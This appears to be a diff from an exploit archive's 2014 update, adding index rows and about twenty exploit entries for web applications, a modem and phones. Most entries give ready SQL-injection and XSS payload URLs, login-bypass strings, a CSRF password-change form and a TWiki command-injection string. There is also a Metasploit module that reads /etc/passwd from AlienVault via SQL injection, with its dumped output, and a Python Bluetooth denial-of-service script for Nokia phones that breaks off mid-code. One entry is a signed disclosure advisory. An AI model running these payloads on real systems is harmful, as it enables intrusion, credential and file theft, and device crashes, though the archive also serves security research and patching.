Updated 04_03_2014

files.csv

@@ -29399,3 +29399,26 @@ id,file,description,date,author,platform,type,port
 32635,platforms/asp/webapps/32635.txt,"Jbook SQL Injection Vulnerability",2008-12-02,Pouya_Server,asp,webapps,0
 32636,platforms/php/webapps/32636.txt,"Orkut Clone profile_social.php id Parameter SQL Injection",2008-12-02,d3b4g,php,webapps,0
 32637,platforms/php/webapps/32637.txt,"Orkut Clone profile_social.php id Parameter XSS",2008-12-02,d3b4g,php,webapps,0
+32638,platforms/php/webapps/32638.txt,"Horde Webmail 5.1 - Open Redirect Vulnerability",2014-04-01,"felipe andrian",php,webapps,0
+32639,platforms/php/webapps/32639.txt,"yappa-ng index.php album Parameter XSS",2008-12-03,Pouya_Server,php,webapps,0
+32640,platforms/php/webapps/32640.txt,"yappa-ng Query String XSS",2008-12-03,Pouya_Server,php,webapps,0
+32641,platforms/php/webapps/32641.txt,"RevSense 1.0 SQL Injection and Cross Site Scripting Vulnerabilities",2008-12-04,Pouya_Server,php,webapps,0
+32642,platforms/php/webapps/32642.txt,"PHPSTREET Webboard 1.0 'show.php' SQL Injection Vulnerability",2008-12-04,"CWH Underground",php,webapps,0
+32643,platforms/windows/remote/32643.txt,"PhonerLite 2.14 SIP Soft Phone - SIP Digest Disclosure",2014-04-01,"Jason Ostrom",windows,remote,5060
+32644,platforms/php/webapps/32644.txt,"AlienVault 4.5.0 Authenticated SQL Injection",2014-04-01,"Brandon Perry",php,webapps,443
+32645,platforms/php/webapps/32645.txt,"TWiki 4.x SEARCH Variable Remote Command Execution Vulnerability",2008-12-06,"Troy Bollinge",php,webapps,0
+32646,platforms/php/webapps/32646.txt,"TWiki 4.x URLPARAM Variable Cross Site Scripting Vulnerability",2008-12-06,"Marc Schoenefeld",php,webapps,0
+32647,platforms/php/webapps/32647.txt,"PrestaShop 1.1 admin/login.php PATH_INFO Parameter XSS",2008-12-08,th3.r00k.ieatpork,php,webapps,0
+32648,platforms/php/webapps/32648.txt,"PrestaShop 1.1 order.php PATH_INFO Parameter XSS",2008-12-08,th3.r00k.ieatpork,php,webapps,0
+32649,platforms/php/webapps/32649.txt,"PhPepperShop 1.4 index.php URL XSS",2008-12-08,th3.r00k.ieatpork,php,webapps,0
+32650,platforms/php/webapps/32650.txt,"PhPepperShop 1.4 shop/kontakt.php URL XSS",2008-12-08,th3.r00k.ieatpork,php,webapps,0
+32651,platforms/php/webapps/32651.txt,"PhPepperShop 1.4 shop/Admin/shop_kunden_mgmt.php URL XSS",2008-12-08,th3.r00k.ieatpork,php,webapps,0
+32652,platforms/php/webapps/32652.txt,"PhPepperShop 1.4 shop/Admin/SHOP_KONFIGURATION.php URL XSS",2008-12-08,th3.r00k.ieatpork,php,webapps,0
+32653,platforms/asp/webapps/32653.txt,"dotnetindex Professional Download Assistant 0.1 SQL Injection Vulnerability",2008-12-09,ZoRLu,asp,webapps,0
+32654,platforms/windows/remote/32654.txt,"Internet Explorer 8 CSS 'expression' Property Cross Site Scripting Filter Bypass Weakness",2008-12-11,"Rafel Ivgi",windows,remote,0
+32655,platforms/jsp/webapps/32655.txt,"Multiple Ad Server Solutions Products 'logon_processing.jsp' SQL Injection Vulnerabilities",2008-12-11,"3d D3v!L",jsp,webapps,0
+32656,platforms/php/webapps/32656.txt,"Octeth Oempro 3.5.5 Multiple SQL Injection Vulnerabilities",2008-12-01,"security curmudgeon",php,webapps,0
+32657,platforms/windows/remote/32657.py,"Nokia N70 and N73 Malformed OBEX Name Header Remote Denial of Service Vulnerability",2008-12-12,NCNIPC,windows,remote,0
+32658,platforms/asp/webapps/32658.txt,"ASP-DEV XM Events Diary 'cat' Parameter SQL Injection Vulnerability",2008-12-13,Pouya_Server,asp,webapps,0
+32659,platforms/hardware/webapps/32659.txt,"ICOMM 610 Wireless Modem - CSRF Vulnerability",2014-04-02,"Blessen Thomas",hardware,webapps,0
+32660,platforms/asp/webapps/32660.txt,"CIS Manager CMS - SQL Injection",2014-04-02,"felipe andrian",asp,webapps,0

platforms/asp/webapps/32653.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/32706/info
+
+Professional Download Assistant is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Professional Download Assistant 0.1 is vulnerable; other versions may be affected as well. 
+
+The following example is available:
+
+user: ZoRLu
+password: ' or '
+

platforms/asp/webapps/32658.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/32809/info
+
+ASP-DEV XM Events Diary is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/[path]/default.asp?cat=[SQL] 

platforms/asp/webapps/32660.txt

@@ -0,0 +1,14 @@
+[+] Sql Injection on CIS Manager CMS
+[+] Date: 01/04/2014
+[+] Risk: High
+[+] Author: Felipe Andrian Peixoto
+[+] Vendor Homepage: http://www.construtiva.com.br/
+[+] Contact: felipe_andrian@hotmail.com
+[+] Tested on: Windows 7 and Linux
+[+] Vulnerable File: default.asp
+[+} Dork : intext:"Powered by CIS Manager"
+[+] Exploit : http://host/site/default.asp?TroncoID=[SQL Injection] 
+        
+
+
+ 

platforms/hardware/webapps/32659.txt

@@ -0,0 +1,53 @@
+Exploit Title : ICOMM 610 Wireless Modem CSRF Vulnerability
+
+Google dork : N/A
+
+Date : 02/04/2014
+
+Exploit Author : Blessen Thomas
+
+Vendor Homepage : http://www.icommtele.com/
+
+Software Link : N/A
+
+Version : ICOMM 610
+
+Tested on : Device software version 01.01.08.991 (10/01/2010)
+
+Type of Application : Modem Web Application
+
+CVE : N/A
+
+Cross Site Request Forgery
+
+It was observed that this modem's Web Application , suffers from Cross-site
+
+request forgery through which attacker can manipulate user data via sending
+him malicious craft url.
+
+
+At attacker could change the password of the victim's account without the
+victim's knowledge as the
+
+application is not having a security token implemented.
+
+
+The Modem's application is not using any security token to prevent it
+against CSRF. You can manipulate any userdata. PoC and Exploit to change
+user password: In the POC the IP address in the POST is the modems IP
+address. 
+
+
+
+<html>
+  <!-- CSRF PoC --->
+  <body>
+    <form action="http://192.168.1.1/cgi-bin/sysconf.cgi?page=personalize_password.asp&sid=rjPd8QVqvRGX×tamp=1396366701157" method="POST">
+      <input type="hidden" name="PasswdEnable" value="on" />
+      <input type="hidden" name="New_Passwd" value="test" />
+      <input type="hidden" name="Confirm_New_Passwd" value="test" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+

platforms/jsp/webapps/32655.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/32782/info
+
+Multiple Ad Server Solutions products are prone to SQL-injection vulnerabilities because they fail to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+The following Ad Server Solutions products are vulnerable:
+
+Ad Management Software
+Affiliate Software 
+
+The following example data is available:
+
+username: r0' or ' 1=1--
+password: r0' or ' 1=1-- 

platforms/php/webapps/32638.txt

@@ -0,0 +1,16 @@
+[+] Horde webmail - Open Redirect Vulnerability 
+[+] Date: 31/03/2014
+[+] Risk: Low
+[+] Remote: Yes
+[+] Author: Felipe Andrian Peixoto
+[+] Vendor Homepage: http://www.horde.org/apps/webmail
+[+] Contact: felipe_andrian@hotmail.com
+[+] Tested on: Windows 7 and Linux
+[+] Vulnerable File: go.php
+[+] Dork: inurl:horde/util/go.php?
+[+] Version: 5.1 probably other versions too
+[+] Exploit : http://host/horde/util/go.php?url=[ Open Redirect Vul ]
+
+Note : An open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation. 
+This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it.
+Reference :https://www.owasp.org/index.php/Open_redirect

platforms/php/webapps/32639.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/32623/info
+
+The 'yappa-ng' program is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/[Path]/index.php?album=%00'"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&adminlogin=Pouya_Server

platforms/php/webapps/32640.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/32623/info
+ 
+The 'yappa-ng' program is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+ 
+http://www.example.com/[Path]/?>"'><ScRiPt>alert(1369)</ScRiPt> 

platforms/php/webapps/32641.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/32624/info
+
+RevSense is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+RevSense 1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/?f%5Bemail%5D=test@mail.com&f%5Bpassword%5D=\"&section=user&action=login
+http://www.example.com/?section=<ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&action=login&t=Pouya
+http://www.example.com/index.php?section=<script>alert(1369)</script>&action=login 

platforms/php/webapps/32642.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/32635/info
+
+PHPSTREET Webboard is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/show.php?id=1/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(user,0x3a3a,password),1,1,1,1,1,1/**/FROM/**/mysql.user 

platforms/php/webapps/32644.txt

@@ -0,0 +1,196 @@
+The following request is vulnerable to a SQL injection attack from authenticated users.
+ 
+GET /ossim/report/BusinessAndComplianceISOPCI/ISO27001Bar1.php?date_from=2014-02-28&date_to=2014-03-30 HTTP/1.1
+Host: 172.31.16.150
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://172.31.16.150/ossim/report/wizard_run.php?run=ZmRzYWZkc2EjIyNhZG1pbg==
+Cookie: PHPSESSID=jllhuhmphk6ma5q8q2i0hm0mr1;
+Connection: keep-alive
+ 
+ 
+------------------------------------------------------------------------------------------------
+ 
+The following metasploit module will exploit this in order to read a file off of the file system:
+ 
+ 
+##
+## This module requires Metasploit: http//metasploit.com/download
+## Current source: https://github.com/rapid7/metasploit-framework
+###
+ 
+require 'msf/core'
+ 
+class Metasploit4 < Msf::Auxiliary
+ 
+include Msf::Exploit::Remote::HttpClient
+ 
+def initialize(info={})
+super(update_info(info,
+'Name' => "AlienVault 4.5.0 authenticated SQL injection arbitrary file read",
+'Description' => %q{
+AlienVault 4.5.0 is susceptible to an authenticated SQL injection attack via a PNG
+generation PHP file. This module exploits this to read an arbitrary file from
+the file system. Any authed user should be usable. Admin not required.
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'Brandon Perry <bperry.volatile[at]gmail.com>' #meatpistol module
+],
+'References' =>
+[
+],
+'Platform' => ['linux'],
+'Privileged' => false,
+'DisclosureDate' => "Mar 30 2014"))
+ 
+register_options(
+[
+OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd']),
+OptString.new('USERNAME', [ true, 'Single username', 'username']),
+OptString.new('PASSWORD', [ true, 'Single password', 'password']),
+OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/'])
+], self.class)
+ 
+end
+ 
+def run
+res = send_request_cgi({
+'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php')
+})
+ 
+cookie = res.get_cookies
+ 
+post = {
+'embed' => '',
+'bookmark_string' => '',
+'user' => datastore['USERNAME'],
+'passu' => datastore['PASSWORD'],
+'pass' => Rex::Text.encode_base64(datastore['PASSWORD'])
+}
+ 
+res = send_request_cgi({
+'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php'),
+'method' => 'POST',
+'vars_post' => post,
+'cookie' => cookie
+})
+ 
+if res.headers['Location'] != '/ossim/'
+fail_with('Authentication failed')
+end
+ 
+cookie = res.get_cookies
+ 
+done = false
+i = 0
+full = ''
+ 
+while !done
+pay = "2014-02-28' AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x7175777471,"
+pay << "(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x2f6574632f706173737764)) AS CHAR),"
+pay << "0x20)),#{(50*i)+1},50)),0x7169716d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"
+pay << " GROUP BY x)a) AND 'xnDa'='xnDa"
+ 
+get = {
+'date_from' => pay,
+'date_to' => '2014-03-30'
+}
+ 
+res = send_request_cgi({
+'uri' => normalize_uri(target_uri.path, 'ossim', 'report', 'BusinessAndComplianceISOPCI', 'ISO27001Bar1.php'),
+'cookie' => cookie,
+'vars_get' => get
+})
+ 
+file = /quwtq(.*)qiqmq/.match(res.body)
+ 
+file = file[1]
+ 
+if file == ''
+done = true
+end
+ 
+str = [file].pack("H*")
+full << str
+vprint_status(str)
+ 
+i = i+1
+ 
+end
+ 
+path = store_loot('alienvault.file', 'text/plain', datastore['RHOST'], full, datastore['FILEPATH'])
+print_good("File stored at path: " + path)
+end
+end
+ 
+-----------------------------------------------------------------------------
+ 
+Quick run of the module:
+ 
+msf auxiliary(alienvault_isp27001_sqli) > show options
+ 
+Module options (auxiliary/gather/alienvault_isp27001_sqli):
+ 
+Name Current Setting Required Description
+---- --------------- -------- -----------
+FILEPATH /etc/passwd yes Path to remote file
+PASSWORD password yes Single password
+Proxies no Use a proxy chain
+RHOST 172.31.16.150 yes The target address
+RPORT 443 yes The target port
+TARGETURI / yes Relative URI of installation
+USERNAME username yes Single username
+VHOST no HTTP server virtual host
+ 
+msf auxiliary(alienvault_isp27001_sqli) > run
+ 
+[+] File stored at path: /home/bperry/.msf4/loot/20140330080922_default_172.31.16.150_alienvault.file_049766.txt
+[*] Auxiliary module execution completed
+80922_default_172.31.16.150_alienvault.file_049766.txterry/.msf4/loot/201403300
+[*] exec: cat /home/bperry/.msf4/loot/20140330080922_default_172.31.16.150_alienvault.file_049766.txt
+ 
+root:x:0:0:root:/root:/usr/bin/llshell
+daemon:x:1:1:daemon:/usr/sbin:/bin/sh
+bin:x:2:2:bin:/bin:/bin/sh
+sys:x:3:3:sys:/dev:/bin/sh
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/bin/sh
+man:x:6:12:man:/var/cache/man:/bin/sh
+lp:x:7:7:lp:/var/spool/lpd:/bin/sh
+mail:x:8:8:mail:/var/mail:/bin/sh
+news:x:9:9:news:/var/spool/news:/bin/sh
+uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
+proxy:x:13:13:proxy:/bin:/bin/sh
+www-data:x:33:33:www-data:/var/www:/bin/sh
+backup:x:34:34:backup:/var/backups:/bin/sh
+list:x:38:38:Mailing List Manager:/var/list:/bin/sh
+irc:x:39:39:ircd:/var/run/ircd:/bin/sh
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
+nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
+libuuid:x:100:101::/var/lib/libuuid:/bin/sh
+sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
+munin:x:102:104::/var/lib/munin:/bin/false
+postfix:x:103:106::/var/spool/postfix:/bin/false
+snmp:x:104:108::/var/lib/snmp:/bin/false
+hacluster:x:105:109:Heartbeat System Account,,,:/usr/lib/heartbeat:/bin/false
+ossec:x:1000:1000::/var/ossec/:/bin/false
+ossecm:x:1001:1000::/var/ossec/:/bin/false
+ossecr:x:1002:1000::/var/ossec/:/bin/false
+ntop:x:106:111::/var/lib/ntop:/bin/false
+snort:x:107:112:Snort IDS:/var/log/snort:/bin/false
+prads:x:108:113::/home/prads:/bin/false
+nagios:x:109:114::/var/lib/nagios:/bin/false
+mysql:x:110:115:MySQL Server,,,:/var/lib/mysql:/bin/false
+asec:x:111:116:Alienvault smart event system user,,,:/var/lib/asec:/bin/false
+mongodb:x:112:65534::/home/mongodb:/bin/false
+avserver:x:113:121:AlienVault SIEM,,,:/home/avserver:/bin/false
+avidm:x:114:121:AlienVault IDM,,,:/home/avidm:/bin/false
+stunnel4:x:115:122::/var/run/stunnel4:/bin/false
+avagent:x:116:121:AlienVault Agent,,,:/home/avagent:/bin/false
+avapi:x:117:121:AlienVault SIEM,,,:/home/avapi:/bin/bash
+rabbitmq:x:118:123:RabbitMQ messaging server,,,:/var/lib/rabbitmq:/bin/false
+avforw:x:119:121:AlienVault SIEM,,,:/home/avforw:/bin/false
+msf auxiliary(alienvault_isp27001_sqli) > 

platforms/php/webapps/32645.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/32668/info
+
+TWiki is prone to a vulnerability that attackers can leverage to execute arbitrary commands in the context of the application. This issue occurs because the application fails to adequately sanitize user-supplied input.
+
+Successful attacks can compromise the affected application and possibly the underlying computer. 
+
+Enter the following in the application's search box:
+%SEARCH{ date="P`pr -?`" search="xyzzy" }%
+
+http://www.example.com/twiki/bin/view/Main/WebSearch?search=%25SEARCH%7Bdate%3D%22P%60pr+-%3F%60%22+search%3D%22xyzzy%22%7D%25&scope=all 

platforms/php/webapps/32646.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/32669/info
+
+TWiki is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+An HTML form field must exist containing an input value with specifying an encoding. As an example:
+
+<input type="text" name="city" value="%URLPARAM{ "city" }%" />
+
+THe following examples will then demonstrate this issue:
+
+http://example.com/twiki/view/TWiki/WebSearch?search=%27a%20onmouseover=alert(document.cookie)%20%27
+
+http://example.com/twiki/view/TWiki/ResetPassword?username="<script language=Javascript>alert('3y3 0wn j00 TWIKI')</script>

platforms/php/webapps/32647.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/32689/info
+
+PrestaShop is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+PrestaShop 1.1 beta 3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/prestashop_1.1.0.3/admin/login.php/%22%3Cscript%3Ealert(1)%3C/script%3E

platforms/php/webapps/32648.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/32689/info
+ 
+PrestaShop is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+ 
+PrestaShop 1.1 beta 3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/prestashop_1.1.0.3/order.php/%22%3Cscript%3Ealert(1)%3C/script%3E

platforms/php/webapps/32649.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/32690/info
+
+PhPepperShop is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+PhPepperShop 1.4 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php/%22%3Cscript%3Ealert(1)%3C/script%3E

platforms/php/webapps/32650.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/32690/info
+ 
+PhPepperShop is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+ 
+PhPepperShop 1.4 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/shop/kontakt.php/&#039;<script>alert(1)</script>

platforms/php/webapps/32651.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/32690/info
+  
+PhPepperShop is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+  
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+  
+PhPepperShop 1.4 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/Audit/Commerce/HackMe/shop/Admin/shop_kunden_mgmt.php/%22%3Cscript%3Ealert(1)%3C/script%3E

platforms/php/webapps/32652.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/32690/info
+   
+PhPepperShop is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+   
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+   
+PhPepperShop 1.4 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/Audit/Commerce/HackMe/shop/Admin/SHOP_KONFIGURATION.php/"<script>alert(1)</script>

platforms/php/webapps/32656.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/32784/info
+
+Octeth Oempro is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Octeth Oempro 3.5.5.1 is vulnerable; other versions may also be affected.
+
+The following example input data is available:
+
+Email: ' or 0=0 #
+Password: password 

platforms/windows/remote/32643.txt

@@ -0,0 +1,127 @@
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA256
+
+I. Advisory Summary
+
+Title: SIP Digest Leak Information Disclosure in PhonerLite 2.14 SIP Soft Phone
+Date Published: March 30, 2014
+Vendors contacted: Heiko Sommerfeldt, PhonerLite author
+Discovered by: Jason Ostrom
+Severity: Medium
+
+II. Vulnerability Scoring Metrics
+
+CVE Reference: CVE-2014-2560
+CVSS v2 Base Score: 4.3
+CVSS v2 Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)
+Component(s): PhonerLite SIP Soft Phone
+Class: Information Disclosure
+
+III. Introduction
+
+PhonerLite [1] is a freeware SIP soft phone client running on the Windows
+platform and supporting common VoIP features as well as security
+functionality such as SIP TLS, SRTP, and ZRTP.
+
+[1] http://www.phonerlite.de
+
+IV. Vulnerability Description
+
+PhonerLite SIP soft phone version 2.14 is vulnerable to revealing SIP MD5
+digest authenticated user credential hash via spoofed SIP INVITE message
+sent by a malicious 3rd party. After responding back to an authentication
+challenge to the BYE message, PhonerLite leaks the hashed MD5 digest
+credentials. After the 3rd party receives the dumped MD5 hash, they can use
+this information to mount an offline wordlist attack. This SIP protocol
+implementation issue vulnerability was initially discovered by Sandro Gauci
+of Enable Security [2], with vendor soft phones and handsets showing
+differential success in mitigating this flaw. CVE-IDs have been reserved
+for two previous SIP soft phone implementations [3, 4] that were tested as
+vulnerable.
+
+[2] https://resources.enablesecurity.com/resources/sipdigestleak-tut.pdf
+[3] CVE-ID for Gizmo5 soft phone: CVE-2009-5139
+[4] CVE-ID for Linksys SPA2102 adapter: CVE-2009-5140
+
+V. Technical Description / Proof of Concept Code
+
+The following steps can be carried out in duplicating this vulnerability.
+
+Step 1:
+Use SIPp protocol tester to craft a SIP INVITE message using TCP transport
+and forward the SIP message towards the IP address of the Windows PhonerLite
+soft phone, listening on TCP port 5060
+Step 2:
+PhonerLite user answers call
+Step 3:
+PhonerLite user hangs up call, since there is no one talking (it is like
+dead air)
+Step 4:
+Attacker receives BYE message from PhonerLite. Immediately after receiving
+BYE, attacker sends a 401 challenge SIP message
+Step 5:
+PhonerLite responds with a second BYE message, containing SIP Authorization
+header (which contains MD5 hash / response)
+Step 6:
+Attacker mounts an offline wordlist attack against the dumped MD5 hash using
+sipdump/sipcrack
+
+Additional Notes:
+* The vulnerability verification was tested as a malicious 3rd party using
+Kali Linux [5] distribution, with all tools included in distro.
+* The attacker does not need to know the correct username of PhonerLite
+registered SIP user. The attacker only needs to find the IP address of a
+PhonerLite endpoint listening on TCP port 5060.
+* The attacker does not need to know the digest realm field. A null realm
+string of "NULL" or "null" will be sufficient in exploiting the flaw.
+* Verified that PhonerLite is not vulnerable to this security flaw when
+attacker uses UDP transport instead of TCP
+
+[5] http://kali.org
+
+VIII. Vendor Information, Solutions, and Workarounds
+
+This issue is fixed in PhonerLite version 2.15
+
+Resolution is the following, as specified by the author: A SIP UAC (User
+Agent Client) should not send a 401 or 407. In other words, only a UAS
+(User Agent Server) should send a 401 or 407 challenge. Therefore, a
+401/407 will be dropped by the UAS (PhonerLite) if sent by a malicious 3rd
+party UAC.
+
+IX. Credits
+
+This vulnerability has been discovered by:
+Jason Ostrom of Stora
+
+XX. Vulnerability History
+
+Sun, 2/16/14: Vulnerability discovered
+Wed, 3/12/14: Sent vulnerability disclosure to Heiko Sommerfeldt, info at
+phoner.de
+Thu, 3/13/14: Notified by author that Beta version has been uploaded, which
+should fix problem. Attempted to verify with security testing of Beta 2.15.
+Verified that issue has been resolved.
+Sun, 3/30/14: Notified by author that fixed version (2.15) has been
+uploaded
+Sun, 3/30/14: Vulnerability disclosure posted
+
+XXI. Disclaimer
+
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise. Stora accepts no
+responsibility for any damage caused by the use or misuse of this
+information.
+
+-----BEGIN PGP SIGNATURE-----
+Version: Encryption Desktop 10.3.2 (Build 15238)
+Charset: us-ascii
+
+wsBVAwUBUzl9EWRzm/FWea0uAQjX8gf/Ts6IWfPbMFeir5PxDrvQ2VWBNCESgODN
+GgJQZaj6339ZxIMFC6IYoD4Uvx223igSB+OyYHLmGZOnQoES7Ilj2Or5Afe71Cqe
+ExqYe2fTaZeyruWTgmPA296W3EEoT+Cedeyy5k0+sxK4ahKZ2DQgM/WIDDHU3X/B
+nAJZWob+r2f2tQr+OBhy7saMEix9QMNeAEZCa+JJ8az9gxe6+AU9kdmwj9hPy+qc
+ZDODMOSyvYojfuvE0oy0AyZ1OBWVpI9lSCI6wmUT6ihOpruz3OKQT+e1HyFoBvmX
+aafzW7VlbxgS3EQRC25EWj61BYVIy7OpIFfOzymyBnL/qb0PTBmiDA==
+=rmxn
+-----END PGP SIGNATURE-----

platforms/windows/remote/32654.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/32780/info
+
+Microsoft Internet Explorer is a web browser for the Microsoft Windows operating system.
+
+Internet Explorer 8 includes a cross-site-scripting filter that is designed to prevent cross-site-scripting attacks against vulnerable web applications. Attackers may be able to bypass this filter under certain conditions, such as by taking advantage of an existing vulnerability in a web application.
+
+Internet Explorer 8 beta 2 is vulnerable. 
+
+} BODY{a:expression(alert(&#039;hi&#039;))};</style>***<style>***

platforms/windows/remote/32657.py

@@ -0,0 +1,50 @@
+source: http://www.securityfocus.com/bid/32796/info
+
+Multiple Nokia phones are prone to a remote denial-of-service vulnerability in their handling of the Object Exchange protocol.
+
+Attackers may exploit this issue to crash a vulnerable phone, creating a denial-of-service condition. Note that attackers must be able to communicate with the device via Bluetooth to take advantage of this issue.
+
+This issue is reported in N70 and N73 phones; additional devices may also be vulnerable.
+
+# PoC code to demonstrate the flaw in the OBEX implementation of Nokia phones
+# Tested under Windows XP SP2
+# Coded by the penetration test team Of NCNIPC (China)
+
+# PyBluez are required to run the code
+from bluetooth import *
+
+# Bluetooth address and OBEX channel of the target device
+# Replace them with the appropriate values for your device
+target = ("00:15:A0:F9:E6:03", 10)
+
+# Make a connection
+sock = BluetoothSocket(RFCOMM)
+sock.connect(target)
+
+# Connect to the OBEX service
+connect_pkg = "\x80\x00\x07\x10\x00\xff\xfe"
+sock.send(connect_pkg)
+con_recv=sock.recv(20)
+
+if con_recv[0]=='\xa0':
+    # Now we are connected
+
+    # The name string that consists of a single 0x0009 character, which will
+    # cause the phone to lock up
+    name_str = "\x00\x09"
+    
+    # Construct and send the malformed packet
+    name_header = "\x01\x00" + chr(len(name_str) + 5) + name_str + "\x00\x00";
